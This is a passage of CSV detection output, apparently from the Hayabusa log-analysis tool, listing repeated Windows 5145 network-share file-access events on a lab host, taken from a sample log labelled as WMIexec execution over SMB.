0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a#\f39c57237f98d69b4abdc9e3907d8fe7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479#\9fd6e8c8110ccd01fd6745507b906c04 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b#\ec2e3c1e16b1d1427b32d2f2babf99bc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084#\a9175ff6a1a8784975c70e9933314ecd | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5#\c7ef2b5b5fc4335bef3148904cb3f0e5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a#\a5c640ad1645775e93d560f67f3ea1d1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e#\865873dc1b8af370b7a314c3c89dcfd0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168#\9d5a241e9cf3bdb8312058004ea269f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\68828aa1ea98316a22a4d8488267b07b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b#\7cb1fc2895121ae7e24841bd0c24b25e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656#\e1349161320cee221fb339c41ab73546 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83#\59420f153f7bb0ef6f63e75d08020c8c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\433ad5082c48708eb6acf6fa065c1461 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5#\87b325b56b362a5d2dca93029c0d75b8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786#\8078dc8e65f16bfd95c09cce4fe0280e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611#\54330dabd4f5e29c758461cbbf2a4f34 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1#\50399e243bf8da1addc23305521efbd9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#\174cd66357bfa0b262b0dbd9bd0e64e3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce#\f05e09fe4c0d9354867afe11b4e9db8c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.811 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\89e812888a4e94f1d2bf0da1c4c6ee5b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb#\f3228ac51b37737ae2ce1176bbbad2ce | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136#\cabc62ca2a04f99fe9af65799a727687 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\1617c5f47d154a5d7cf1f53851398006 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\19b334bb62b3c76cfcc7137bb03371c3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b#\822ee6a8aa9386352052b7bd2610f3b5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62#\ab00f4aa6892c4c6d39b87f078e8208f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b#\93b57911ae369118b40a5605c448eb9d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
